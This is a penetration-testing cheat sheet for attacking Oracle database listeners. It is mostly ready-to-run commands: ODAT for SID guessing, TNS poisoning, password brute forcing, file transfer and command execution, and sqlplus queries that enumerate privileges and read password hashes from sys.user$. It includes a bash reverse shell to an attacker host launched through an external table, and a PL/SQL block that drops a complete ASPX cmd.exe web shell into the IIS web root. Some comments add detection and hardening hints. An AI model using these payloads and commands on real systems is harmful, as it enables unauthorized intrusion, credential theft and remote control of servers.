# Oracle SQL | 1521

## 00. Basic

```bash
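## ------------------| Nmap Scans
## Default scripts plus service/version detection against the listener port.
sudo nmap -Pn -sC -sV -p1521 "$IP"
## The script pattern is quoted so the shell hands it to nmap unchanged instead of
## expanding it against file names in the current directory.
sudo nmap -Pn -sC -sV -p1521 --script "*oracle*" "$IP"
sudo nmap -Pn -sC -sV -p1521 --script oracle-sid-brute "$IP"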
```

## 01. ODAT (Oracle Database Attacking Tool)

```bash
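## ------------------| Install on aarch64 (ARM)
## Build and runtime prerequisites for the Instant Client.
sudo apt-get install libaio1t64 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git && cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/instantclient-basic-linux-arm64.zip
wget https://download.oracle.com/otn_software/linux/instantclient/instantclient-sqlplus-linux-arm64.zip
unzip instantclient-basic-linux-arm64.zip
unzip instantclient-sqlplus-linux-arm64.zip
## The archives unpack to instantclient_<major>_<minor>; pick the directory up from disk
## instead of hard-coding a version that changes whenever Oracle refreshes the download.
ic_dir="$(pwd)/$(ls -d instantclient_*/ | head -n 1 | tr -d '/')"
## Appended to ~/.zshrc; use ~/.bashrc instead if your shell is bash.
## \$LD_LIBRARY_PATH and \$PATH stay escaped so they expand at shell start-up.
echo "export LD_LIBRARY_PATH=\"${ic_dir}:\$LD_LIBRARY_PATH\"" >> ~/.zshrc
echo "export PATH=\"\$PATH:${ic_dir}\"" >> ~/.zshrc
sudo apt-get install -y python3-cx-oracle python3-scapy python3-colorlog python3-termcolor python3-passlib python3-pycryptodome python3-pyinstaller python3-libnmap build-essential libgmp-dev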

## ------------------| Scan all
## Runs ODAT's modules one after another against the listener. This is noisy:
## expect entries in the listener log and in database auditing.
odat all -s $IP -p 1521

## ------------------| Scan SID
odat sidguesser -s $IP -p 1521

## ------------------| TNS Poisoning
## --test-module only checks whether the listener accepts the registration;
## --poison performs it, which can disrupt or redirect client connections on a live listener.
## Hardening on the server side: restrict registration with
## VALID_NODE_CHECKING_REGISTRATION_<listener_name> in listener.ora.
odat tnspoison -s $IP -p 1521 -d <SID> --test-module
odat tnspoison -s $IP -p 1521 -d <SID> --poison 

## ------------------| Brute Force Passwords
## Failed logins count against the profile's FAILED_LOGIN_ATTEMPTS limit, so guessing
## can lock accounts; check the lockout policy before running this against production.
odat passwordguesser -s $IP -p 1521 -d <SID> -U h4rithd -P passwords.txt
odat passwordguesser -s $IP -d <SID> --accounts-file /usr/share/odat/accounts/accounts.txt

## ------------------| Test Connection to Oracle Database
## A password given with -P ends up in shell history and is visible in the process list.
odat test -s $IP -d <SID> -U h4rithd -P password123

## ------------------| Upload Files to Oracle Server
## Goes through UTL_FILE on the server, so the file is written by the database server process.
odat utlfile -s $IP -d <SID> -U h4rithd -P password123 --putFile="<LOCAL_FILE_PATH>" --remotePath="<REMOTE_PATH>"

## ------------------| Download File from Server
odat utlfile -s $IP -d <SID> -U h4rithd -P password123 --getFile="<REMOTE_FILE_PATH>" --localPath="<LOCAL_PATH>"

## ------------------| Execute Java Code
odat java -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --exec "whoami"

## ------------------| Execute Reverse Shell
odat externaltable -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --exec "bash -i >& /dev/tcp/attacker_ip/4444 0>&1"

## ------------------| Enumerate UTL_HTTP Access
## In the enumeration entries below, --test-module reports whether the given account can use
## the module. A positive result points at a grant worth reviewing on the server
## (EXECUTE on UTL_HTTP / UTL_TCP / UTL_FILE, Java permissions, directory and external-table rights).
odat utlhttp -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Enumerate UTL_TCP Access
odat utltcp -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Enumerate UTL_FILE Access
odat utlfile -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Enumerate JAVA Access
odat java -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Enumerate External Table Access
odat externaltable -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Enumerate CTXSYS Access
odat ctxsys -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Check if Oracle Listener is Running
## NOTE(review): no action flag is passed here; --test-module (used in the TNS Poisoning
## entry above) is the explicit check. Confirm what a bare invocation actually does.
odat tnspoison -s $IP -d <SID> -U h4rithd -P password123

## ------------------| Perform TNS Poisoning Attack
## Same action as the --poison line in the TNS Poisoning entry, here with credentials supplied.
odat tnspoison -s $IP -d <SID> -U h4rithd -P password123 --poison
```

## 02. SQLPLUS

```bash
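## ------------------| Setup [intel]
sudo apt-get install oracle-instantclient-sqlplus
which sqlplus
## Adjust 19.6 to the client version the package actually installed under /usr/lib/oracle.
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
## Prepend rather than overwrite, so library paths that are already set keep working.
export LD_LIBRARY_PATH="$ORACLE_HOME/lib${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}"
export PATH="$ORACLE_HOME/bin:$PATH"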

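## ------------------| Setup [ARM]
## Stage the archives in a private temp directory: fixed file names under world-writable
## /dev/shm can be pre-created or swapped by another local user before they are unpacked
## into /opt and put on PATH / LD_LIBRARY_PATH.
dl_dir=$(mktemp -d)
base_url=https://download.oracle.com/otn_software/linux/instantclient
## Writing under /opt usually needs root; run this section as root or prefix mkdir/unzip with sudo.
mkdir -p /opt/oracle
for pkg in basic sqlplus sdk; do
    wget "$base_url/instantclient-$pkg-linux-arm64.zip" -O "$dl_dir/instantclient-$pkg-linux-arm64.zip"
    unzip -d /opt/oracle "$dl_dir/instantclient-$pkg-linux-arm64.zip"
done
## Name of the top-level directory inside the archive (instantclient_<major>_<minor>).
version=$(unzip -l "$dl_dir/instantclient-basic-linux-arm64.zip" | awk '{print $4}' | grep '^instantclient_' | cut -d/ -f1 | sort -u)
## \$PATH and \$LD_LIBRARY_PATH are escaped so they expand each time the shell starts;
## unescaped, today's PATH would be frozen into ~/.zshrc.
echo "export PATH=\$PATH:/opt/oracle/$version" >> ~/.zshrc
echo "export TNS_ADMIN=/opt/oracle/$version" >> ~/.zshrc
echo "export LD_LIBRARY_PATH=/opt/oracle/$version\${LD_LIBRARY_PATH:+:\$LD_LIBRARY_PATH}" >> ~/.zshrc
echo "export ORACLE_HOME=/opt/oracle/$version" >> ~/.zshrc
rm -rf "$dl_dir"
## The variables above only take effect in a new shell (or after sourcing ~/.zshrc);
## run the version check from there.
sqlplus -V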

## ------------------| Login as user
## Easy Connect form: user/password@//host:port/<service>. The last component is normally a
## service name (XE in the examples below).
## A password on the command line is visible in shell history and the process list;
## leaving it out makes sqlplus prompt for it instead.
sqlplus username/password@//host:port/SID
sqlplus <USERNAME>/'<PASSWORD>'@<IP>:1521/XE

## ------------------| Login as superuser
## "as sysdba" succeeds only when the account has been granted SYSDBA.
sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba

## ------------------| Show Current User
-- The statements in this section are typed at the SQL> prompt after connecting.
SELECT USER FROM DUAL;

## ------------------| List All Users
SELECT username FROM all_users;

## ------------------| List User Roles
-- user_* views describe only the connected account.
SELECT * FROM user_role_privs;

## ------------------| List User System Privileges
SELECT * FROM user_sys_privs;

## ------------------| Show Session Privileges
-- Privileges active in this session, including those that come from enabled roles.
SELECT * FROM session_privs;

## ------------------| List User Table Privileges
SELECT * FROM user_tab_privs;

## ------------------| List All Tables (Accessible)
-- all_* views cover every object the connected account can access, not only its own.
SELECT table_name FROM all_tables;

## ------------------| List Tables Owned by Current User
SELECT table_name FROM user_tables;

## ------------------| Describe Table Structure
-- DESC is a SQL*Plus command, not a SQL statement.
DESC table_name;

## ------------------| Select All Data from a Table
SELECT * FROM table_name;

## ------------------| Get Oracle Version
SELECT * FROM v$version;

## ------------------| Get Current Database Name
-- v$database and v$session normally need catalog/DBA-level read access;
-- ORA-00942 here means the account does not have it.
SELECT name FROM v$database;

## ------------------| Check Current User Sessions
SELECT username, sid, serial#, status FROM v$session;

## ------------------| List All Roles
-- dba_* views are readable only with DBA-level dictionary access.
SELECT * FROM dba_roles;

## ------------------| Check Role Privileges
SELECT * FROM role_sys_privs;

## ------------------| List Columns in a Table
-- The dictionary stores unquoted identifiers in upper case, so the literal must be upper case.
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE_NAME';

## ------------------| Check Grants Given to a User
SELECT * FROM dba_sys_privs WHERE grantee = 'USERNAME';

## ------------------| Check Password Hashes (10g or before)
-- sys.user$ is owned by SYS; being able to read it implies DBA-level access.
-- Auditing SELECT on this table is a useful detection on the server side.
SELECT name, password FROM sys.user$;

## ------------------| Check Tablespaces
SELECT tablespace_name FROM dba_tablespaces;

## ------------------| Check Users and Default Tablespace
SELECT username, default_tablespace FROM dba_users;

## ------------------| Read File Using UTL_FILE in Oracle
-- Prints the first line of a server-side file. Needs EXECUTE on UTL_FILE and a location
-- the database is allowed to open; revoking EXECUTE on UTL_FILE from PUBLIC and limiting
-- directory grants closes this path.
-- SERVEROUTPUT must be on, otherwise DBMS_OUTPUT text is not shown by SQL*Plus.
SET SERVEROUTPUT ON;

DECLARE
   f UTL_FILE.FILE_TYPE;   -- file handle
   s VARCHAR2(5000);       -- buffer for one line
BEGIN
   -- FOPEN(location, filename, open_mode): 'R' opens for reading. The location is resolved
   -- on the database server, and the file is accessed by the database server process.
   f := UTL_FILE.FOPEN('/inetpub/wwwroot', 'iisstart.htm', 'R');
   -- Reads a single line only; the rest of the file is not returned.
   UTL_FILE.GET_LINE(f, s);
   -- NOTE(review): there is no exception handler, so the handle stays open if GET_LINE raises.
   UTL_FILE.FCLOSE(f);
   DBMS_OUTPUT.PUT_LINE(s);
END;
/ # Hit enter then type '/' and  hit enter

## ------------------| Write File Using UTL_FILE in Oracle
-- Writes one line of text to a server-side file. The file is created by the database
-- server process, so it succeeds only where that process has write access and the
-- account can execute UTL_FILE on the chosen location.
DECLARE
   f UTL_FILE.FILE_TYPE;                          -- file handle
   s VARCHAR2(5000) := 'h4rithd was there';       -- content written as a single line
BEGIN
   -- 'W' opens for writing; the location is resolved on the database server.
   f := UTL_FILE.FOPEN('/inetpub/wwwroot', 'h4rith.txt', 'W');
   UTL_FILE.PUT_LINE(f, s);
   -- NOTE(review): no exception handler, so the handle stays open if PUT_LINE raises.
   UTL_FILE.FCLOSE(f);
END;
/ # Hit enter then type '/' and  hit enter

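## ------------------| Drop ASPX Web Shell Using UTL_FILE
## The file is created by the database server process, so it only lands in the web root when that account can write there. New script files in a web root whose creator is the Oracle service account are a strong detection signal.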
DECLARE
   f UTL_FILE.FILE_TYPE;
   s VARCHAR2(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
BEGIN
   f := UTL_FILE.FOPEN('/inetpub/wwwroot', 'h4rithd.aspx', 'W');
   UTL_FILE.PUT_LINE(f, s);
   UTL_FILE.FCLOSE(f);
END;
/ # Hit enter then type '/' and  hit enter
```


